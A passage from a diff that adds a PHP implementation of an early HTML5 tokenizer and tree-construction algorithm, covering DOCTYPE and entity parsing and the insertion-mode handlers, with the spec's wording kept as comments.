$this->EOF) { + $this->emitToken(array( + 'name' => null, + 'type' => self::DOCTYPE, + 'error' => true + )); + + $this->char--; + $this->state = 'data'; + + } else { + $this->token = array( + 'name' => $char, + 'type' => self::DOCTYPE, + 'error' => true + ); + + $this->state = 'doctypeName'; + } + } + + private function doctypeNameState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + $this->state = 'AfterDoctypeName'; + + } elseif($char === '>') { + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif(preg_match('/^[a-z]$/', $char)) { + $this->token['name'] .= strtoupper($char); + + } elseif($this->char === $this->EOF) { + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + } else { + $this->token['name'] .= $char; + } + + $this->token['error'] = ($this->token['name'] === 'HTML') + ? false + : true; + } + + private function afterDoctypeNameState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + // Stay in the DOCTYPE name state. + + } elseif($char === '>') { + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + } else { + $this->token['error'] = true; + $this->state = 'bogusDoctype'; + } + } + + private function bogusDoctypeState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if($char === '>') { + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + } else { + // Stay in the bogus DOCTYPE state. + } + } + + private function entity() { + $start = $this->char; + + // This section defines how to consume an entity. This definition is + // used when parsing entities in text and in attributes. + + // The behaviour depends on the identity of the next character (the + // one immediately after the U+0026 AMPERSAND character): + + switch($this->character($this->char + 1)) { + // U+0023 NUMBER SIGN (#) + case '#': + + // The behaviour further depends on the character after the + // U+0023 NUMBER SIGN: + switch($this->character($this->char + 1)) { + // U+0078 LATIN SMALL LETTER X + // U+0058 LATIN CAPITAL LETTER X + case 'x': + case 'X': + // Follow the steps below, but using the range of + // characters U+0030 DIGIT ZERO through to U+0039 DIGIT + // NINE, U+0061 LATIN SMALL LETTER A through to U+0066 + // LATIN SMALL LETTER F, and U+0041 LATIN CAPITAL LETTER + // A, through to U+0046 LATIN CAPITAL LETTER F (in other + // words, 0-9, A-F, a-f). + $char = 1; + $char_class = '0-9A-Fa-f'; + break; + + // Anything else + default: + // Follow the steps below, but using the range of + // characters U+0030 DIGIT ZERO through to U+0039 DIGIT + // NINE (i.e. just 0-9). + $char = 0; + $char_class = '0-9'; + break; + } + + // Consume as many characters as match the range of characters + // given above. + $this->char++; + $e_name = $this->characters($char_class, $this->char + $char + 1); + $entity = $this->character($start, $this->char); + $cond = strlen($e_name) > 0; + + // The rest of the parsing happens bellow. + break; + + // Anything else + default: + // Consume the maximum number of characters possible, with the + // consumed characters case-sensitively matching one of the + // identifiers in the first column of the entities table. + $e_name = $this->characters('0-9A-Za-z;', $this->char + 1); + $len = strlen($e_name); + + for($c = 1; $c <= $len; $c++) { + $id = substr($e_name, 0, $c); + $this->char++; + + if(in_array($id, $this->entities)) { + if ($e_name[$c-1] !== ';') { + if ($c < $len && $e_name[$c] == ';') { + $this->char++; // consume extra semicolon + } + } + $entity = $id; + break; + } + } + + $cond = isset($entity); + // The rest of the parsing happens bellow. + break; + } + + if(!$cond) { + // If no match can be made, then this is a parse error. No + // characters are consumed, and nothing is returned. + $this->char = $start; + return false; + } + + // Return a character token for the character corresponding to the + // entity name (as given by the second column of the entities table). + return html_entity_decode('&'.$entity.';', ENT_QUOTES, 'UTF-8'); + } + + private function emitToken($token) { + $emit = $this->tree->emitToken($token); + + if(is_int($emit)) { + $this->content_model = $emit; + + } elseif($token['type'] === self::ENDTAG) { + $this->content_model = self::PCDATA; + } + } + + private function EOF() { + $this->state = null; + $this->tree->emitToken(array( + 'type' => self::EOF + )); + } +} + +class HTML5TreeConstructer { + public $stack = array(); + + private $phase; + private $mode; + private $dom; + private $foster_parent = null; + private $a_formatting = array(); + + private $head_pointer = null; + private $form_pointer = null; + + private $scoping = array('button','caption','html','marquee','object','table','td','th'); + private $formatting = array('a','b','big','em','font','i','nobr','s','small','strike','strong','tt','u'); + private $special = array('address','area','base','basefont','bgsound', + 'blockquote','body','br','center','col','colgroup','dd','dir','div','dl', + 'dt','embed','fieldset','form','frame','frameset','h1','h2','h3','h4','h5', + 'h6','head','hr','iframe','image','img','input','isindex','li','link', + 'listing','menu','meta','noembed','noframes','noscript','ol','optgroup', + 'option','p','param','plaintext','pre','script','select','spacer','style', + 'tbody','textarea','tfoot','thead','title','tr','ul','wbr'); + + // The different phases. + const INIT_PHASE = 0; + const ROOT_PHASE = 1; + const MAIN_PHASE = 2; + const END_PHASE = 3; + + // The different insertion modes for the main phase. + const BEFOR_HEAD = 0; + const IN_HEAD = 1; + const AFTER_HEAD = 2; + const IN_BODY = 3; + const IN_TABLE = 4; + const IN_CAPTION = 5; + const IN_CGROUP = 6; + const IN_TBODY = 7; + const IN_ROW = 8; + const IN_CELL = 9; + const IN_SELECT = 10; + const AFTER_BODY = 11; + const IN_FRAME = 12; + const AFTR_FRAME = 13; + + // The different types of elements. + const SPECIAL = 0; + const SCOPING = 1; + const FORMATTING = 2; + const PHRASING = 3; + + const MARKER = 0; + + public function __construct() { + $this->phase = self::INIT_PHASE; + $this->mode = self::BEFOR_HEAD; + $this->dom = new DOMDocument; + + $this->dom->encoding = 'UTF-8'; + $this->dom->preserveWhiteSpace = true; + $this->dom->substituteEntities = true; + $this->dom->strictErrorChecking = false; + } + + // Process tag tokens + public function emitToken($token) { + switch($this->phase) { + case self::INIT_PHASE: return $this->initPhase($token); break; + case self::ROOT_PHASE: return $this->rootElementPhase($token); break; + case self::MAIN_PHASE: return $this->mainPhase($token); break; + case self::END_PHASE : return $this->trailingEndPhase($token); break; + } + } + + private function initPhase($token) { + /* Initially, the tree construction stage must handle each token + emitted from the tokenisation stage as follows: */ + + /* A DOCTYPE token that is marked as being in error + A comment token + A start tag token + An end tag token + A character token that is not one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE + An end-of-file token */ + if((isset($token['error']) && $token['error']) || + $token['type'] === HTML5::COMMENT || + $token['type'] === HTML5::STARTTAG || + $token['type'] === HTML5::ENDTAG || + $token['type'] === HTML5::EOF || + ($token['type'] === HTML5::CHARACTR && isset($token['data']) && + !preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data']))) { + /* This specification does not define how to handle this case. In + particular, user agents may ignore the entirety of this specification + altogether for such documents, and instead invoke special parse modes + with a greater emphasis on backwards compatibility. */ + + $this->phase = self::ROOT_PHASE; + return $this->rootElementPhase($token); + + /* A DOCTYPE token marked as being correct */ + } elseif(isset($token['error']) && !$token['error']) { + /* Append a DocumentType node to the Document node, with the name + attribute set to the name given in the DOCTYPE token (which will be + "HTML"), and the other attributes specific to DocumentType objects + set to null, empty lists, or the empty string as appropriate. */ + $doctype = new DOMDocumentType(null, null, 'HTML'); + + /* Then, switch to the root element phase of the tree construction + stage. */ + $this->phase = self::ROOT_PHASE; + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + } elseif(isset($token['data']) && preg_match('/^[\t\n\x0b\x0c ]+$/', + $token['data'])) { + /* Append that character to the Document node. */ + $text = $this->dom->createTextNode($token['data']); + $this->dom->appendChild($text); + } + } + + private function rootElementPhase($token) { + /* After the initial phase, as each token is emitted from the tokenisation + stage, it must be processed as described in this section. */ + + /* A DOCTYPE token */ + if($token['type'] === HTML5::DOCTYPE) { + // Parse error. Ignore the token. + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the Document object with the data + attribute set to the data given in the comment token. */ + $comment = $this->dom->createComment($token['data']); + $this->dom->appendChild($comment); + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + } elseif($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append that character to the Document node. */ + $text = $this->dom->createTextNode($token['data']); + $this->dom->appendChild($text); + + /* A character token that is not one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED + (FF), or U+0020 SPACE + A start tag token + An end tag token + An end-of-file token */ + } elseif(($token['type'] === HTML5::CHARACTR && + !preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) || + $token['type'] === HTML5::STARTTAG || + $token['type'] === HTML5::ENDTAG || + $token['type'] === HTML5::EOF) { + /* Create an HTMLElement node with the tag name html, in the HTML + namespace. Append it to the Document object. Switch to the main + phase and reprocess the current token. */ + $html = $this->dom->createElement('html'); + $this->dom->appendChild($html); + $this->stack[] = $html; + + $this->phase = self::MAIN_PHASE; + return $this->mainPhase($token); + } + } + + private function mainPhase($token) { + /* Tokens in the main phase must be handled as follows: */ + + /* A DOCTYPE token */ + if($token['type'] === HTML5::DOCTYPE) { + // Parse error. Ignore the token. + + /* A start tag token with the tag name "html" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'html') { + /* If this start tag token was not the first start tag token, then + it is a parse error. */ + + /* For each attribute on the token, check to see if the attribute + is already present on the top element of the stack of open elements. + If it is not, add the attribute and its corresponding value to that + element. */ + foreach($token['attr'] as $attr) { + if(!$this->stack[0]->hasAttribute($attr['name'])) { + $this->stack[0]->setAttribute($attr['name'], $attr['value']); + } + } + + /* An end-of-file token */ + } elseif($token['type'] === HTML5::EOF) { + /* Generate implied end tags. */ + $this->generateImpliedEndTags(); + + /* Anything else. */ + } else { + /* Depends on the insertion mode: */ + switch($this->mode) { + case self::BEFOR_HEAD: return $this->beforeHead($token); break; + case self::IN_HEAD: return $this->inHead($token); break; + case self::AFTER_HEAD: return $this->afterHead($token); break; + case self::IN_BODY: return $this->inBody($token); break; + case self::IN_TABLE: return $this->inTable($token); break; + case self::IN_CAPTION: return $this->inCaption($token); break; + case self::IN_CGROUP: return $this->inColumnGroup($token); break; + case self::IN_TBODY: return $this->inTableBody($token); break; + case self::IN_ROW: return $this->inRow($token); break; + case self::IN_CELL: return $this->inCell($token); break; + case self::IN_SELECT: return $this->inSelect($token); break; + case self::AFTER_BODY: return $this->afterBody($token); break; + case self::IN_FRAME: return $this->inFrameset($token); break; + case self::AFTR_FRAME: return $this->afterFrameset($token); break; + case self::END_PHASE: return $this->trailingEndPhase($token); break; + } + } + } + + private function beforeHead($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data attribute + set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* A start tag token with the tag name "head" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'head') { + /* Create an element for the token, append the new element to the + current node and push it onto the stack of open elements. */ + $element = $this->insertElement($token); + + /* Set the head element pointer to this new element node. */ + $this->head_pointer = $element; + + /* Change the insertion mode to "in head". */ + $this->mode = self::IN_HEAD; + + /* A start tag token whose tag name is one of: "base", "link", "meta", + "script", "style", "title". Or an end tag with the tag name "html". + Or a character token that is not one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE. Or any other start tag token */ + } elseif($token['type'] === HTML5::STARTTAG || + ($token['type'] === HTML5::ENDTAG && $token['name'] === 'html') || + ($token['type'] === HTML5::CHARACTR && !preg_match('/^[\t\n\x0b\x0c ]$/', + $token['data']))) { + /* Act as if a start tag token with the tag name "head" and no + attributes had been seen, then reprocess the current token. */ + $this->beforeHead(array( + 'name' => 'head', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + return $this->inHead($token); + + /* Any other end tag */ + } elseif($token['type'] === HTML5::ENDTAG) { + /* Parse error. Ignore the token. */ + } + } + + private function inHead($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE. + + THIS DIFFERS FROM THE SPEC: If the current node is either a title, style + or script element, append the character to the current node regardless + of its content. */ + if(($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) || ( + $token['type'] === HTML5::CHARACTR && in_array(end($this->stack)->nodeName, + array('title', 'style', 'script')))) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data attribute + set to the data given in the comment token. */ + $this->insertComment($token['data']); + + } elseif($token['type'] === HTML5::ENDTAG && + in_array($token['name'], array('title', 'style', 'script'))) { + array_pop($this->stack); + return HTML5::PCDATA; + + /* A start tag with the tag name "title" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'title') { + /* Create an element for the token and append the new element to the + node pointed to by the head element pointer, or, if that is null + (innerHTML case), to the current node. */ + if($this->head_pointer !== null) { + $element = $this->insertElement($token, false); + $this->head_pointer->appendChild($element); + + } else { + $element = $this->insertElement($token); + } + + /* Switch the tokeniser's content model flag to the RCDATA state. */ + return HTML5::RCDATA; + + /* A start tag with the tag name "style" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'style') { + /* Create an element for the token and append the new element to the + node pointed to by the head element pointer, or, if that is null + (innerHTML case), to the current node. */ + if($this->head_pointer !== null) { + $element = $this->insertElement($token, false); + $this->head_pointer->appendChild($element); + + } else { + $this->insertElement($token); + } + + /* Switch the tokeniser's content model flag to the CDATA state. */ + return HTML5::CDATA; + + /* A start tag with the tag name "script" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'script') { + /* Create an element for the token. */ + $element = $this->insertElement($token, false); + $this->head_pointer->appendChild($element); + + /* Switch the tokeniser's content model flag to the CDATA state. */ + return HTML5::CDATA; + + /* A start tag with the tag name "base", "link", or "meta" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('base', 'link', 'meta'))) { + /* Create an element for the token and append the new element to the + node pointed to by the head element pointer, or, if that is null + (innerHTML case), to the current node. */ + if($this->head_pointer !== null) { + $element = $this->insertElement($token, false); + $this->head_pointer->appendChild($element); + array_pop($this->stack); + + } else { + $this->insertElement($token); + } + + /* An end tag with the tag name "head" */ + } elseif($token['type'] === HTML5::ENDTAG && $token['name'] === 'head') { + /* If the current node is a head element, pop the current node off + the stack of open elements. */ + if($this->head_pointer->isSameNode(end($this->stack))) { + array_pop($this->stack); + + /* Otherwise, this is a parse error. */ + } else { + // k + } + + /* Change the insertion mode to "after head". */ + $this->mode = self::AFTER_HEAD; + + /* A start tag with the tag name "head" or an end tag except "html". */ + } elseif(($token['type'] === HTML5::STARTTAG && $token['name'] === 'head') || + ($token['type'] === HTML5::ENDTAG && $token['name'] !== 'html')) { + // Parse error. Ignore the token. + + /* Anything else */ + } else { + /* If the current node is a head element, act as if an end tag + token with the tag name "head" had been seen. */ + if($this->head_pointer->isSameNode(end($this->stack))) { + $this->inHead(array( + 'name' => 'head', + 'type' => HTML5::ENDTAG + )); + + /* Otherwise, change the insertion mode to "after head". */ + } else { + $this->mode = self::AFTER_HEAD; + } + + /* Then, reprocess the current token. */ + return $this->afterHead($token); + } + } + + private function afterHead($token) { + /* Handle the token as follows: */ + + /* A character token that is one of one of U+0009 CHARACTER TABULATION, + U+000A LINE FEED (LF), U+000B LINE TABULATION, U+000C FORM FEED (FF), + or U+0020 SPACE */ + if($token['type'] === HTML5::CHARACTR && + preg_match('/^[\t\n\x0b\x0c ]+$/', $token['data'])) { + /* Append the character to the current node. */ + $this->insertText($token['data']); + + /* A comment token */ + } elseif($token['type'] === HTML5::COMMENT) { + /* Append a Comment node to the current node with the data attribute + set to the data given in the comment token. */ + $this->insertComment($token['data']); + + /* A start tag token with the tag name "body" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'body') { + /* Insert a body element for the token. */ + $this->insertElement($token); + + /* Change the insertion mode to "in body". */ + $this->mode = self::IN_BODY; + + /* A start tag token with the tag name "frameset" */ + } elseif($token['type'] === HTML5::STARTTAG && $token['name'] === 'frameset') { + /* Insert a frameset element for the token. */ + $this->insertElement($token); + + /* Change the insertion mode to "in frameset". */ + $this->mode = self::IN_FRAME; + + /* A start tag token whose tag name is one of: "base", "link", "meta", + "script", "style", "title" */ + } elseif($token['type'] === HTML5::STARTTAG && in_array($token['name'], + array('base', 'link', 'meta', 'script', 'style', 'title'))) { + /* Parse error. Switch the insertion mode back to "in head" and + reprocess the token. */ + $this->mode = self::IN_HEAD; + return $this->inHead($token); + + /* Anything else */ + } else { + /* Act as if a start tag token with the tag name "body" and no + attributes had been seen, and then reprocess the current token. */ + $this->afterHead(array( + 'name' => 'body', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + return $this->inBody($token); + } + } + + private function inBody($token) { + /* Handle the token as follows: */ + + switch($token['type']) { + /* A character token */ + case HTML5::CHARACTR: + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Append the token's character to the current node. */ + $this->insertText($token['data']); + break; + + /* A comment token */ + case HTML5::COMMENT: + /* Append a Comment node to the current node with the data + attribute set to the data given in the comment token. */ + $this->insertComment($token['data']); + break; + + case HTML5::STARTTAG: + switch($token['name']) { + /* A start tag token whose tag name is one of: "script", + "style" */ + case 'script': case 'style': + /* Process the token as if the insertion mode had been "in + head". */ + return $this->inHead($token); + break; + + /* A start tag token whose tag name is one of: "base", "link", + "meta", "title" */ + case 'base': case 'link': case 'meta': case 'title': + /* Parse error. Process the token as if the insertion mode + had been "in head". */ + return $this->inHead($token); + break; + + /* A start tag token with the tag name "body" */ + case 'body': + /* Parse error. If the second element on the stack of open + elements is not a body element, or, if the stack of open + elements has only one node on it, then ignore the token. + (innerHTML case) */ + if(count($this->stack) === 1 || $this->stack[1]->nodeName !== 'body') { + // Ignore + + /* Otherwise, for each attribute on the token, check to see + if the attribute is already present on the body element (the + second element) on the stack of open elements. If it is not, + add the attribute and its corresponding value to that + element. */ + } else { + foreach($token['attr'] as $attr) { + if(!$this->stack[1]->hasAttribute($attr['name'])) { + $this->stack[1]->setAttribute($attr['name'], $attr['value']); + } + } + } + break; + + /* A start tag whose tag name is one of: "address", + "blockquote", "center", "dir", "div", "dl", "fieldset", + "listing", "menu", "ol", "p", "ul" */ + case 'address': case 'blockquote': case 'center': case 'dir': + case 'div': case 'dl': case 'fieldset': case 'listing': + case 'menu': case 'ol': case 'p': case 'ul': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been + seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + break; + + /* A start tag whose tag name is "form" */ + case 'form': + /* If the form element pointer is not null, ignore the + token with a parse error. */ + if($this->form_pointer !== null) { + // Ignore. + + /* Otherwise: */ + } else { + /* If the stack of open elements has a p element in + scope, then act as if an end tag with the tag name p + had been seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token, and set the + form element pointer to point to the element created. */ + $element = $this->insertElement($token); + $this->form_pointer = $element; + } + break; + + /* A start tag whose tag name is "li", "dd" or "dt" */ + case 'li': case 'dd': case 'dt': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been + seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + $stack_length = count($this->stack) - 1; + + for($n = $stack_length; 0 <= $n; $n--) { + /* 1. Initialise node to be the current node (the + bottommost node of the stack). */ + $stop = false; + $node = $this->stack[$n]; + $cat = $this->getElementCategory($node->tagName); + + /* 2. If node is an li, dd or dt element, then pop all + the nodes from the current node up to node, including + node, then stop this algorithm. */ + if($token['name'] === $node->tagName || ($token['name'] !== 'li' + && ($node->tagName === 'dd' || $node->tagName === 'dt'))) { + for($x = $stack_length; $x >= $n ; $x--) { + array_pop($this->stack); + } + + break; + } + + /* 3. If node is not in the formatting category, and is + not in the phrasing category, and is not an address or + div element, then stop this algorithm. */ + if($cat !== self::FORMATTING && $cat !== self::PHRASING && + $node->tagName !== 'address' && $node->tagName !== 'div') { + break; + } + } + + /* Finally, insert an HTML element with the same tag + name as the token's. */ + $this->insertElement($token); + break; + + /* A start tag token whose tag name is "plaintext" */ + case 'plaintext': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been + seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + return HTML5::PLAINTEXT; + break; + + /* A start tag whose tag name is one of: "h1", "h2", "h3", "h4", + "h5", "h6" */ + case 'h1': case 'h2': case 'h3': case 'h4': case 'h5': case 'h6': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* If the stack of open elements has in scope an element whose + tag name is one of "h1", "h2", "h3", "h4", "h5", or "h6", then + this is a parse error; pop elements from the stack until an + element with one of those tag names has been popped from the + stack. */ + while($this->elementInScope(array('h1', 'h2', 'h3', 'h4', 'h5', 'h6'))) { + array_pop($this->stack); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + break; + + /* A start tag whose tag name is "a" */ + case 'a': + /* If the list of active formatting elements contains + an element whose tag name is "a" between the end of the + list and the last marker on the list (or the start of + the list if there is no marker on the list), then this + is a parse error; act as if an end tag with the tag name + "a" had been seen, then remove that element from the list + of active formatting elements and the stack of open + elements if the end tag didn't already remove it (it + might not have if the element is not in table scope). */ + $leng = count($this->a_formatting); + + for($n = $leng - 1; $n >= 0; $n--) { + if($this->a_formatting[$n] === self::MARKER) { + break; + + } elseif($this->a_formatting[$n]->nodeName === 'a') { + $this->emitToken(array( + 'name' => 'a', + 'type' => HTML5::ENDTAG + )); + break; + } + } + + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $el = $this->insertElement($token); + + /* Add that element to the list of active formatting + elements. */ + $this->a_formatting[] = $el; + break; + + /* A start tag whose tag name is one of: "b", "big", "em", "font", + "i", "nobr", "s", "small", "strike", "strong", "tt", "u" */ + case 'b': case 'big': case 'em': case 'font': case 'i': + case 'nobr': case 's': case 'small': case 'strike': + case 'strong': case 'tt': case 'u': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $el = $this->insertElement($token); + + /* Add that element to the list of active formatting + elements. */ + $this->a_formatting[] = $el; + break; + + /* A start tag token whose tag name is "button" */ + case 'button': + /* If the stack of open elements has a button element in scope, + then this is a parse error; act as if an end tag with the tag + name "button" had been seen, then reprocess the token. (We don't + do that. Unnecessary.) */ + if($this->elementInScope('button')) { + $this->inBody(array( + 'name' => 'button', + 'type' => HTML5::ENDTAG + )); + } + + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Insert a marker at the end of the list of active + formatting elements. */ + $this->a_formatting[] = self::MARKER; + break; + + /* A start tag token whose tag name is one of: "marquee", "object" */ + case 'marquee': case 'object': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Insert a marker at the end of the list of active + formatting elements. */ + $this->a_formatting[] = self::MARKER; + break; + + /* A start tag token whose tag name is "xmp" */ + case 'xmp': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Switch the content model flag to the CDATA state. */ + return HTML5::CDATA; + break; + + /* A start tag whose tag name is "table" */ + case 'table': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Change the insertion mode to "in table". */ + $this->mode = self::IN_TABLE; + break; + + /* A start tag whose tag name is one of: "area", "basefont", + "bgsound", "br", "embed", "img", "param", "spacer", "wbr" */ + case 'area': case 'basefont': case 'bgsound': case 'br': + case 'embed': case 'img': case 'param': case 'spacer': + case 'wbr': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Immediately pop the current node off the stack of open elements. */ + array_pop($this->stack); + break; + + /* A start tag whose tag name is "hr" */ + case 'hr': + /* If the stack of open elements has a p element in scope, + then act as if an end tag with the tag name p had been seen. */ + if($this->elementInScope('p')) { + $this->emitToken(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + } + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Immediately pop the current node off the stack of open elements. */ + array_pop($this->stack); + break; + + /* A start tag whose tag name is "image" */ + case 'image': + /* Parse error. Change the token's tag name to "img" and + reprocess it. (Don't ask.) */ + $token['name'] = 'img'; + return $this->inBody($token); + break; + + /* A start tag whose tag name is "input" */ + case 'input': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an input element for the token. */ + $element = $this->insertElement($token, false); + + /* If the form element pointer is not null, then associate the + input element with the form element pointed to by the form + element pointer. */ + $this->form_pointer !== null + ? $this->form_pointer->appendChild($element) + : end($this->stack)->appendChild($element); + + /* Pop that input element off the stack of open elements. */ + array_pop($this->stack); + break; + + /* A start tag whose tag name is "isindex" */ + case 'isindex': + /* Parse error. */ + // w/e + + /* If the form element pointer is not null, + then ignore the token. */ + if($this->form_pointer === null) { + /* Act as if a start tag token with the tag name "form" had + been seen. */ + $this->inBody(array( + 'name' => 'body', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + /* Act as if a start tag token with the tag name "hr" had + been seen. */ + $this->inBody(array( + 'name' => 'hr', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + /* Act as if a start tag token with the tag name "p" had + been seen. */ + $this->inBody(array( + 'name' => 'p', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + /* Act as if a start tag token with the tag name "label" + had been seen. */ + $this->inBody(array( + 'name' => 'label', + 'type' => HTML5::STARTTAG, + 'attr' => array() + )); + + /* Act as if a stream of character tokens had been seen. */ + $this->insertText('This is a searchable index. '. + 'Insert your search keywords here: '); + + /* Act as if a start tag token with the tag name "input" + had been seen, with all the attributes from the "isindex" + token, except with the "name" attribute set to the value + "isindex" (ignoring any explicit "name" attribute). */ + $attr = $token['attr']; + $attr[] = array('name' => 'name', 'value' => 'isindex'); + + $this->inBody(array( + 'name' => 'input', + 'type' => HTML5::STARTTAG, + 'attr' => $attr + )); + + /* Act as if a stream of character tokens had been seen + (see below for what they should say). */ + $this->insertText('This is a searchable index. '. + 'Insert your search keywords here: '); + + /* Act as if an end tag token with the tag name "label" + had been seen. */ + $this->inBody(array( + 'name' => 'label', + 'type' => HTML5::ENDTAG + )); + + /* Act as if an end tag token with the tag name "p" had + been seen. */ + $this->inBody(array( + 'name' => 'p', + 'type' => HTML5::ENDTAG + )); + + /* Act as if a start tag token with the tag name "hr" had + been seen. */ + $this->inBody(array( + 'name' => 'hr', + 'type' => HTML5::ENDTAG + )); + + /* Act as if an end tag token with the tag name "form" had + been seen. */ + $this->inBody(array( + 'name' => 'form', + 'type' => HTML5::ENDTAG + )); + } + break; + + /* A start tag whose tag name is "textarea" */ + case 'textarea': + $this->insertElement($token); + + /* Switch the tokeniser's content model flag to the + RCDATA state. */ + return HTML5::RCDATA; + break; + + /* A start tag whose tag name is one of: "iframe", "noembed", + "noframes" */ + case 'iframe': case 'noembed': case 'noframes': + $this->insertElement($token); + + /* Switch the tokeniser's content model flag to the CDATA state. */ + return HTML5::CDATA; + break; + + /* A start tag whose tag name is "select" */ + case 'select': + /* Reconstruct the active formatting elements, if any. */ + $this->reconstructActiveFormattingElements(); + + /* Insert an HTML element for the token. */ + $this->insertElement($token); + + /* Change the insertion mode to "in select". */ + $this->mode = self::IN_SELECT; + break; + + /* A start or end tag whose tag name is one of: "caption", "col", + "colgroup", "frame", "frameset", "head", "option", "optgroup", + "tbody", "td", "tfoot", "th", "thead", "tr". */ + case 'caption': case 'col': case 'colgroup': case 'frame': + case 'frameset': case 'head': case 'option': case 'optgroup': + case 'tbody': case 'td': case 'tfoot': case 'th': case 'thead': + case 'tr': + // Parse error. Ignore the token. + break; + + /* A start or end tag whose tag name is one of: "event-source", + "section", "nav", "article", "aside", "header", "footer", + "datagrid", "command" */ + case 'event-source': case 'section': case 'nav': case 'article': + case 'aside': case 'header': case 'footer': case 'datagrid': + case 'command': + // Work in progress! + break; + + /* A start tag token not covered by the previous entries */ + default: + /* Reconstruct the active formatting elements, if 